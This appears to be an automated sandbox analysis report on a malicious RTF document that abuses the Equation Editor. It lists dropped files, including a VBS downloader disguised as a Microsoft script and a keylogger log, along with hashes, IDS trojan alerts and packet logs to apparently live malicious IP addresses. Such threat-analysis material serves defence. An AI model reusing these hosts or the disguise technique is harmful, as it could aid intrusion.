                                                      Preview:....[.2.0.2.4./.0.5./.0.1. .1.4.:.5.5.:.4.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].....[.R.u.n.].........[.W.i.n.d.o.w.s. .S.c.r.i.p.t. .H.o.s.t.].........[.R.u.n.].........[.W.i.n.d.o.w.s. .E.x.p.l.o.r.e.r.].........[.M.i.c.r.o.s.o.f.t. .W.o.r.d.].....
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Generic INItialization configuration [folders]
                                                      Category:dropped
                                                      Size (bytes):55
                                                      Entropy (8bit):4.676725395303505
                                                      Encrypted:false
                                                      SSDEEP:3:HAwUXp64om4D5Xp64ov:HVV4+64y
                                                      MD5:DF9E342898C52C265F99E90FF588958D
                                                      SHA1:1B6FBD102446763F368C6DAB43FB03ECBAD5D567
                                                      SHA-256:B69ED7945C4881ACE5A8CCC8C8187871773EB975CE91E8E315DEED91753FDE07
                                                      SHA-512:889BAA91F18F9D8F4D820466676A37B8F8E8C51B099F31A7FE6F232030D4740CFF13B68732BC75AED6AA2A358960B04DB37D9673CEA39D502DF158C71D8D9972
                                                      Malicious:false
                                                      Preview:[misc]..nU7Z8sPyvf.LNK=0..[folders]..nU7Z8sPyvf.LNK=0..
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Wed May 1 11:54:57 2024, length=78038, window=hide
                                                      Category:dropped
                                                      Size (bytes):1014
                                                      Entropy (8bit):4.548581584116542
                                                      Encrypted:false
                                                      SSDEEP:12:8tl5qsFgXg/XAlCPCHaXWB5B/5YXX+W2haWIIiv+2icvbsrTC40iv+mDtZ3YilMz:8tL5/XTmr4Xci+Fe0+i+mDv3qrik7N
                                                      MD5:C4510DBD04E169E1BA8C8C0E1507F7E3
                                                      SHA1:B52619E75A66ADE4434926AC3161DE635A18674C
                                                      SHA-256:9EA42014B952B435FD5D89E72923CC1995CEEE9B85AB7D828B70837BB1FEAB45
                                                      SHA-512:335619CEF82C4E4263104C780DCD30E81E66E025696DF7DE0951E8D917703B371588AB9CD3AF73D4ED93DD5613F8B7DA4904D6C0D1E8A0326400AF906CE47BF7
                                                      Malicious:false
                                                      Preview:L..................F.... .......r.......r.....H.....0...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.f..user.8......QK.X.X.f*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..0...X.f .NU7Z8S~1.RTF..J.......WE..WE.*.........................n.U.7.Z.8.s.P.y.v.f...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\818225\Users.user\Desktop\nU7Z8sPyvf.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.n.U.7.Z.8.s.P.y.v.f...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......818225..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.4797606462020307
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                      MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                      SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                      SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                      SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:Unknown
                                                      Category:dropped
                                                      Size (bytes):62754
                                                      Entropy (8bit):3.415813360054804
                                                      Encrypted:false
                                                      SSDEEP:384:FZAaML0EZDnd33oBd33sGMnpMV4ZIRpuPkG6jM1L7Kc0ZCEXJg:7xindnoBdngiV4ZIRgPkGq9ZxZg
                                                      MD5:69A1EBFD93489A6D3DA3ED27FE410D2D
                                                      SHA1:7E138C9C08073B3398BEBFD3DABE8CCD0DE2BA91
                                                      SHA-256:0A363498260F2D08ED884453FC508E0F8812E16C95AA824C8F3A72BE2DEBA140
                                                      SHA-512:4925CC93A10364966AE6F432194D3613A51D176F4EEFD447B679446DCB6CADC008755BC1E17DADA1FCACA2FC56489BA9783CB4A89369B0505BAD1E2C9E578BE5
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_VBS_Downloader_Generic, Description: Yara detected VBS Downloader Generic, Source: C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs, Author: Joe Security
                                                      Preview:..'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....'.....'. .C.o.p.y.r.i.g.h.t. .(.c.). .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n... .A.l.l. .r.i.g.h.t.s. .r.e.s.e.r.v.e.d.......'.....'. .A.b.s.t.r.a.c.t.:.....'. .p.r.n.p.o.r.t...v.b.s. .-. .P.o.r.t. .s.c.r.i.p.t. .f.o.r. .W.M.I. .o.n. .W.i.n.d.o.w.s. .....'. . . . . .u.s.e.d. .t.o. .a.d.d.,. .d.e.l.e.t.e. .a.n.d. .l.i.s.t. .p.o.r.t.s.....'. . . . . .a.l.s.o. .f.o.r. .g.e.t.t.i.n.g. .a.n.d. .s.e.t.t.i.n.g. .t.h.e. .p.o.r.t. .c.o.n.f.i.g.u.r.a.t.i.o.n.....'.....'. .U.s.a.g.e.:.....'. .p.r.n.p.o.r.t. .[.-.a.d.l.g.t.?.]. .[.-.r. .p.o.r.t.]. .[.-.s. .s.e.r.v.e.r.]. .[.-.u. .u.s.e.r. .n.a.m.e.]. .[.-.w. .p.a.s.s.w.o.r.d.].....'. . . . . . . . . . . . . . . . . . . .[.-.o. .r.a.w.|.l.p.r.]. .[.-.h. .h.o.s.t. .a.d.d.r.e.s.s.]. .[.-.q. .q.u.e.u.e.]. .[.-.n. .n.u.m.b.e.r.].....'. . . . . . . . . . . . . . . . . . . .[.-.m.e. .|. .-.m.d. .]. .[.-.i.
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.4797606462020307
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                      MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                      SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                      SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                      SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):59
                                                      Entropy (8bit):3.380843392604297
                                                      Encrypted:false
                                                      SSDEEP:3:ydlX85I2Y1AnI0lLn:yndGIcLn
                                                      MD5:FD9BBFB6504AF9874B4BA3AC07178758
                                                      SHA1:49F24EF83F932F2C3A2814280F08910BC64B5CC8
                                                      SHA-256:AD0D3FB267F1BC5DF8089A8D49C066CF55B0D632187AB1443F614B8A27844176
                                                      SHA-512:B317C14F57C568EC08F7B32E33B8CB42E353B17F98DA3ABFB02189DEDF8D7F632B948C99273DDCF818BFECAC777EA536CFED71729D385DA8A7285A0870DD3CAF
                                                      Malicious:false
                                                      Preview:....8.1.8.2.2.5.....\MAILSLOT\NET\GETDC622.................
                                                      File type:Rich Text Format data, version 1
                                                      Entropy (8bit):2.7686143213703787
                                                      TrID:
                                                      • Rich Text Format (5005/1) 55.56%
                                                      • Rich Text Format (4004/1) 44.44%
                                                      File name:nU7Z8sPyvf.rtf
                                                      File size:78'038 bytes
                                                      MD5:0aba1094e29ed6d65fa5a8b1ec8c2e57
                                                      SHA1:5eb1d60525661ec561ae7e56ed2a5798c0462c1e
                                                      SHA256:45ba5f0e0f5ea330c12f0081f8861a75e65f2849e67038c6106930dd66543186
                                                      SHA512:2ed36b870531ea151290fea7942f4fed89e36a946e343b36134bae50f6d6b3a54902f25461ddf7d137d317bc81e30642379facf4b043c4a2191e8241a8d10eb5
                                                      SSDEEP:1536:CfcQtfa+Hc4YZJBQZCc45Wb/2Y0pRObbhIatQqJlioDfeMbKekD:ufa+Hc4YZJBQZV45Wb/qROb9IEJlioDO
                                                      TLSH:D973AA6DE30F0958DF55A67B434A4A4A05FCB33EB38540B139AC977437ADC2E4A2287C
                                                      File Content Preview:{\rtf1...........{\mmodsofilter704716200 \%}.{\528766508%?6*.*=`+/$6).~%5=|]2/_#+89.*@.@6[^>[.)0](_.[.%71.@!39*!`.?_(3^`/5(&.7^+],@)<?=-:%1>%-*!&#,+-~3.(??9><%!|^1.%!-~7.2+/<^6+`:([)?>/5(*3])?<%?([]-&=,.~(?|#5(+.6?.?.!%%)?16#~|;.`4-(??9@30;`?>3,),/;!.#2<0
                                                      Icon Hash:2764a3aaaeb7bdbf
                                                       Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                       0 | 00000A5Dh | | | | | | | | no
                                                       Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                       05/01/24-14:55:30.813240 | TCP | 2018856 | ET TROJAN Windows executable base64 encoded | 443 | 49168 | 172.67.215.45 | 192.168.2.22
                                                       05/01/24-14:55:30.813240 | TCP | 2047750 | ET TROJAN Base64 Encoded MZ In Image | 443 | 49168 | 172.67.215.45 | 192.168.2.22
                                                       05/01/24-14:55:31.602932 | TCP | 2025011 | ET TROJAN Powershell commands sent B64 2 | 443 | 49168 | 172.67.215.45 | 192.168.2.22
                                                       05/01/24-14:55:44.958525 | TCP | 2020424 | ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 | 80 | 49169 | 107.172.31.6 | 192.168.2.22
                                                       05/01/24-14:55:31.605872 | TCP | 2049038 | ET TROJAN Malicious Base64 Encoded Payload In Image | 443 | 49168 | 172.67.215.45 | 192.168.2.22
                                                       05/01/24-14:55:44.958525 | TCP | 2020423 | ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 | 80 | 49169 | 107.172.31.6 | 192.168.2.22
                                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                       May 1, 2024 14:55:03.341681004 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.497400045 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.497528076 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.500185013 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.656900883 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.656919956 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.656984091 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.657048941 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.657062054 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.657073021 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.657107115 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.657113075 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.657113075 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.657119989 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.657145023 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.657155991 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.657160044 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.657169104 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.657196999 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.657210112 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.657217026 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.657253981 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.660396099 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816699028 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816739082 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816761017 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816793919 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816798925 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816814899 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816828966 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816828966 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816839933 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816845894 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816859007 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816878080 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816885948 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816895962 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816899061 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816912889 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816917896 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816925049 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816937923 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816945076 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816953897 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816966057 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816972017 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816979885 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.816987991 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.816992044 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.817023993 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.817028999 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.817035913 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.817042112 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.817048073 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.817054987 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.817059040 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.817071915 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.817075968 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.817085028 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.817101002 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.817424059 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.971970081 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.972043037 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.972073078 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.972095966 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.972111940 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.972127914 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.972140074 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.972171068 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.972170115 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.972171068 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.972171068 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.972171068 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.972183943 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.972197056 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.972204924 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                       May 1, 2024 14:55:03.972208977 CEST | 80 | 49165 | 107.172.31.6 | 192.168.2.22
                                                       May 1, 2024 14:55:03.972224951 CEST | 49165 | 80 | 192.168.2.22 | 107.172.31.6
                                                      May 1, 2024 14:55:03.972248077 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972248077 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972259045 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972275019 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972289085 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972300053 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972311020 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972311974 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972311020 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972323895 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972337961 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972338915 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972347021 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972357035 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972358942 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972395897 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972395897 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972466946 CEST8049165107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:03.972512960 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:03.972696066 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:04.566231966 CEST4916580192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:24.091336966 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.091381073 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.091434002 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.093838930 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.093868971 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.299412966 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.299489975 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.312580109 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.312598944 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.312941074 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.312985897 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.515609026 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.556126118 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761301041 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761365891 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761389017 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761404037 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761415958 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761437893 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761439085 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761449099 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761473894 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761478901 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761509895 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761512995 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761544943 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.761549950 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.761578083 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790498972 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.790537119 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790543079 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.790575027 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790677071 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.790704966 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790710926 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.790740967 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790944099 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.790986061 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.790990114 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.791004896 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.791038990 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.791091919 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.791102886 CEST44349166104.21.84.67192.168.2.22
                                                      May 1, 2024 14:55:24.791115999 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:24.791141033 CEST49166443192.168.2.22104.21.84.67
                                                      May 1, 2024 14:55:26.680411100 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:26.680447102 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:26.680509090 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:26.698052883 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:26.698067904 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:26.901074886 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:26.901140928 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:26.905508995 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:26.905519962 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:26.905869007 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:27.112127066 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:27.112210035 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.236757040 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.280122042 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360438108 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360487938 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360521078 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360532999 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.360548973 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360584974 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.360591888 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360634089 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360671997 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.360678911 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360860109 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360887051 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360898972 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.360905886 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.360946894 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.361195087 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.361279011 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.361314058 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.361320972 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.361352921 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.361381054 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.361387968 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.361393929 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.361430883 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.362171888 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.362238884 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.362270117 CEST44349167172.67.215.45192.168.2.22
                                                      May 1, 2024 14:55:28.362277031 CEST49167443192.168.2.22172.67.215.45
                                                      May 1, 2024 14:55:28.362283945 CEST44349167172.67.215.45192.168.2.22
